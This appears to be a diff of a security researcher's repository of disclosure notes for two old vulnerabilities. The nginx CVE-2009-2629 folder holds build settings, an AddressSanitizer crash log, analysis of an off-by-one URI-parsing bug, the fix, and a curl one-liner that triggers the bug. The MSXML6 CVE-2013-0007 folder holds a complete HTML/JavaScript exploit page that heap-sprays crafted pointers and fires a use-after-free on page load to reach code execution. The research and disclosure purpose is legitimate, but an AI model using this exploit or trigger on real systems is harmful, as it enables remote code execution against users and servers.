Initialised

CVE-2009-2629_nginx_http/README.md

@@ -0,0 +1,11 @@
+# Disclosure Note
+
+CVE-2009-2629: nginx http module Buffer Underflow Remote Code Execution Vulnerability
+
+Awesome bug, one of a kind. A classical exploitable buffer underflow. Off-by-one in http parsing. Requires a non-standard configuration. Some servers on the Internet still have it (<1%)
+
+### Credits
+
+Vulnerability discovery: unknown
+Vulnerability analysis: Alisa Esage
+Proof of concept: Alisa Esage

CVE-2009-2629_nginx_http/config/build.txt

@@ -0,0 +1,3 @@
+./configure --with-debug --with-cc-opt=-g -Wno-error -fsanitize=address --with-ld-opt=-fsanitize=address --prefix=/home/am/Test/nginx-0.8.14_asan --sbin-path=/home/am/Test/nginx-0.8.14_asan --conf-path=/home/am/Test/nginx-0.8.14_asan/nginx.conf --error-log-path=/home/am/Test/nginx-0.8.14_asan/error.log --http-log-path=/home/am/Test/nginx-0.8.14_asan/access.log --pid-path=/tmp/nginx-0.8.14_asan.pid --lock-path=/var/lock/nginx-0.8.14_asan.lock --with-pcre=/media/psf/Code/pcre-8.34 --with-zlib=/media/psf/Code/zlib-1.2.11
+make && make install
+export ASAN_OPTIONS=detect_leaks=false

CVE-2009-2629_nginx_http/config/nginx.conf

@@ -0,0 +1,121 @@
+
+#user  nobody;
+worker_processes  1;
+
+#error_log  logs/error.log;
+#error_log  logs/error.log  notice;
+#error_log  logs/error.log  info;
+
+#pid        logs/nginx.pid;
+
+
+events {
+    worker_connections  1024;
+}
+
+
+http {
+
+    merge_slashes off;
+
+    include       mime.types;
+    default_type  application/octet-stream;
+
+    #log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
+    #                  '$status $body_bytes_sent "$http_referer" '
+    #                  '"$http_user_agent" "$http_x_forwarded_for"';
+
+    #access_log  logs/access.log  main;
+
+    sendfile        on;
+    #tcp_nopush     on;
+
+    #keepalive_timeout  0;
+    keepalive_timeout  65;
+
+    #gzip  on;
+
+    server {
+        listen       80;
+        server_name  localhost;
+
+        #charset koi8-r;
+
+        #access_log  logs/host.access.log  main;
+
+        location / {
+            root   html;
+            index  index.html index.htm;
+        }
+
+        #error_page  404              /404.html;
+
+        # redirect server error pages to the static page /50x.html
+        #
+        error_page   500 502 503 504  /50x.html;
+        location = /50x.html {
+            root   html;
+        }
+
+        # proxy the PHP scripts to Apache listening on 127.0.0.1:80
+        #
+        #location ~ \.php$ {
+        #    proxy_pass   http://127.0.0.1;
+        #}
+
+        # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
+        #
+        #location ~ \.php$ {
+        #    root           html;
+        #    fastcgi_pass   127.0.0.1:9000;
+        #    fastcgi_index  index.php;
+        #    fastcgi_param  SCRIPT_FILENAME  /scripts$fastcgi_script_name;
+        #    include        fastcgi_params;
+        #}
+
+        # deny access to .htaccess files, if Apache's document root
+        # concurs with nginx's one
+        #
+        #location ~ /\.ht {
+        #    deny  all;
+        #}
+    }
+
+
+    # another virtual host using mix of IP-, name-, and port-based configuration
+    #
+    #server {
+    #    listen       8000;
+    #    listen       somename:8080;
+    #    server_name  somename  alias  another.alias;
+
+    #    location / {
+    #        root   html;
+    #        index  index.html index.htm;
+    #    }
+    #}
+
+
+    # HTTPS server
+    #
+    #server {
+    #    listen       443;
+    #    server_name  localhost;
+
+    #    ssl                  on;
+    #    ssl_certificate      cert.pem;
+    #    ssl_certificate_key  cert.key;
+
+    #    ssl_session_timeout  5m;
+
+    #    ssl_protocols  SSLv2 SSLv3 TLSv1;
+    #    ssl_ciphers  ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
+    #    ssl_prefer_server_ciphers   on;
+
+    #    location / {
+    #        root   html;
+    #        index  index.html index.htm;
+    #    }
+    #}
+
+}

CVE-2009-2629_nginx_http/logs/asan.log

@@ -0,0 +1,58 @@
+2018/11/14 00:06:36 [emerg] 6868#0: bind() to 0.0.0.0:80 failed (13: Permission denied)
+2018/11/14 00:07:22 [emerg] 6940#0: bind() to 0.0.0.0:80 failed (13: Permission denied)
+=================================================================
+==6950==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000b4ff at pc 0x555a74c419db bp 0x7ffdf6992480 sp 0x7ffdf6992478
+READ of size 1 at 0x62100000b4ff thread T0
+    #0 0x555a74c419da in ngx_http_parse_complex_uri src/http/ngx_http_parse.c:1141
+    #1 0x555a74c3d56c in ngx_http_process_request_line src/http/ngx_http_request.c:731
+    #2 0x555a74c33540 in ngx_http_init_request src/http/ngx_http_request.c:513
+    #3 0x555a74c13f84 in ngx_epoll_process_events src/event/modules/ngx_epoll_module.c:642
+    #4 0x555a74bfb666 in ngx_process_events_and_timers src/event/ngx_event.c:245
+    #5 0x555a74c10231 in ngx_worker_process_cycle src/os/unix/ngx_process_cycle.c:781
+    #6 0x555a74c0bd78 in ngx_spawn_process src/os/unix/ngx_process.c:196
+    #7 0x555a74c0e1f1 in ngx_start_worker_processes src/os/unix/ngx_process_cycle.c:345
+    #8 0x555a74c11985 in ngx_master_process_cycle src/os/unix/ngx_process_cycle.c:136
+    #9 0x555a74bc1366 in main src/core/nginx.c:382
+    #10 0x7f94b9b7f2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
+    #11 0x555a74bbed39 in _start (/home/am/Test/nginx-0.8.14_asan/nginx+0x3ad39)
+
+0x62100000b4ff is located 1 bytes to the left of 4096-byte region [0x62100000b500,0x62100000c500)
+allocated by thread T0 here:
+    #0 0x7f94ba68ad28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28)
+    #1 0x555a74c05f59 in ngx_alloc src/os/unix/ngx_alloc.c:21
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow src/http/ngx_http_parse.c:1141 in ngx_http_parse_complex_uri
+Shadow bytes around the buggy address:
+  0x0c427fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x0c427fff9690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
+  0x0c427fff96a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff96b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff96e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==6950==ABORTING

CVE-2009-2629_nginx_http/notes.txt

@@ -0,0 +1,20 @@
+    06.06.2019. Check if the merge_slashes directive is required
+
+ngx_http_parse_complex_uri:
+...
+    case sw_dot_dot:
+...
+    case '/':
+        state = sw_slash;
+        u -= 4;     // <--------- culprit
+        if (u < r->uri.data) {
+            return NGX_HTTP_PARSE_INVALID_REQUEST;
+        }
+        while (*(u - 1) != '/') {
+            u--;
+        }
+
+`u` contains the URI. It must be 4+ characters long to pass the check < r->uri.data. If the URI always starts with a '/' (seems like it, but I didn't prove it), then it must be exactly 4 characters long: otherwise the loop will hit a slash and no underflow. 
+
+If the merge_slashes directive is on (default), then there seems to be no way to make a 4-char URI without additional slashes.
+If the merge_slashes is off, then: //../ 

CVE-2009-2629_nginx_http/patch/ngx_http_parse.c.patch

@@ -0,0 +1,26 @@
+Index: src/http/ngx_http_parse.c
+===================================================================
+--- src/http/ngx_http_parse.c	(revision 2410)
++++ src/http/ngx_http_parse.c	(revision 2411)
+@@ -1134,11 +1134,15 @@
+ #endif
+             case '/':
+                 state = sw_slash;
+-                u -= 4;
+-                if (u < r->uri.data) {
+-                    return NGX_HTTP_PARSE_INVALID_REQUEST;
+-                }
+-                while (*(u - 1) != '/') {
++                u -= 5;
++                for ( ;; ) {
++                    if (u < r->uri.data) {
++                        return NGX_HTTP_PARSE_INVALID_REQUEST;
++                    }
++                    if (*u == '/') {
++                        u++;
++                        break;
++                    }
+                     u--;
+                 }
+                 break;
+

CVE-2009-2629_nginx_http/testcase/testcase.sh

@@ -0,0 +1 @@
+curl http://127.0.0.1//%2e%2e/asdf

CVE-2013-0007_MSXML6/README.md

@@ -0,0 +1,11 @@
+# Disclosure Note
+
+CVE-2013-0007: Microsoft XML Core Services 4-6 Use-after-free Vulnerability
+
+From my Phrack paper: [Exploiting Microsoft XML with misalignment and factorials](http://phrack.org/issues/69/10.html) (2015)
+
+### Credits
+
+Vulnerability discovery: Nicolas Grégoire
+Vulnerability analysis: Alisa Esage
+Proof of concept exploit: Alisa Esage

CVE-2013-0007_MSXML6/exploit/exploit_self-patch.html

@@ -0,0 +1,89 @@
+<!doctype html>
+<html>
+<head>
+
+<script>
+
+function crash() 
+{
+	xslcontent='<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template name="main_template" match="/"><xsl:for-each select="*"><xsl:apply-templates/></xsl:for-each></xsl:template><xsl:template name="xx" match="x[position()]" /></xsl:stylesheet>';
+
+	srcTree=new ActiveXObject("Msxml2.DOMDocument.6.0");
+	xsltTree=new ActiveXObject("Msxml2.DOMDocument.6.0");
+	xsltTree.loadXML(xslcontent);
+	alert("crash");
+	srcTree.transformNode(xsltTree);	
+}
+
+function selfpatch() 
+{
+// !!! +hpa required !!!
+// bp msxml6!xengine::stns;bp msxml6!xengine::brns;g;
+
+	var intArr = new Array;
+	intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01
+
+	var count = (0x19000000-0x20)/4; // 400 Mb 
+
+	// ptr0(crashing)->ptr1->ptr2->shellcode // 0x3a..0x40.. -> 0x3838xxxx -> 0x3838yyyy -> patch or shellcode
+
+	var pbyte = 0x38; // play with me
+	var ptr12base = (pbyte<<24)+(pbyte<<16);  //0x38380000 // landing for the initial memory access
+	var ptr1 = 0; // calculated from the page offset
+	var ptr2 = 0; // calculated from the page offset
+	var ptrcall = 0x54545454; // 0x5454xxxx -> pointers to shellcode
+
+	var delta = 0x3300; // added and removed to segregate the 1st and the 2nd memory access areas within the pattern
+	// the additional bits above 0x1000 are used to enforce the successful 1-byte misaligned memory access
+
+	for(var i=1; i<=count; i++)
+	{
+		var i_pattern = i*4%0x1000; // index into the current page
+
+		// let’s fill the spray tail with plain pointers to call
+		if ( i>(0x12000000/4) ) // which defines where the ‘tail’ begins (chosen empirically)
+		{
+			intArr[i] = 0x00badd1e; 
+			continue;
+		}
+
+		ptr1 = (i_pattern - 8 + 0x20 + delta); 
+		ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff)); 
+
+		// misaligned memory access: fallback to code exec  
+		if ( ((i*4+0x20)&0xff) == (pbyte+4) ) 
+			intArr[i] = ptrcall;
+
+		// well aligned memory access: restore the pointers
+		else if (i_pattern < 0x0700)
+			intArr[i] = ptr12base + ptr1;	
+		else 
+			intArr[i] = ptr12base + ptr2;
+	}
+
+	crash();  
+	alert("Look, no calc!");
+}
+
+function factorial(n) 
+{
+	if (n == 0) 
+	{
+		selfpatch();
+        	return 1;
+    	} 
+	else 
+		return n * factorial(n - 1);
+}
+</script>
+</head>
+
+<body onload="factorial(30);">
+	<form id="a">
+	</form>
+	<dfn id="b">
+	</dfn>
+<div id="resTree"></div>
+
+</body>
+</html>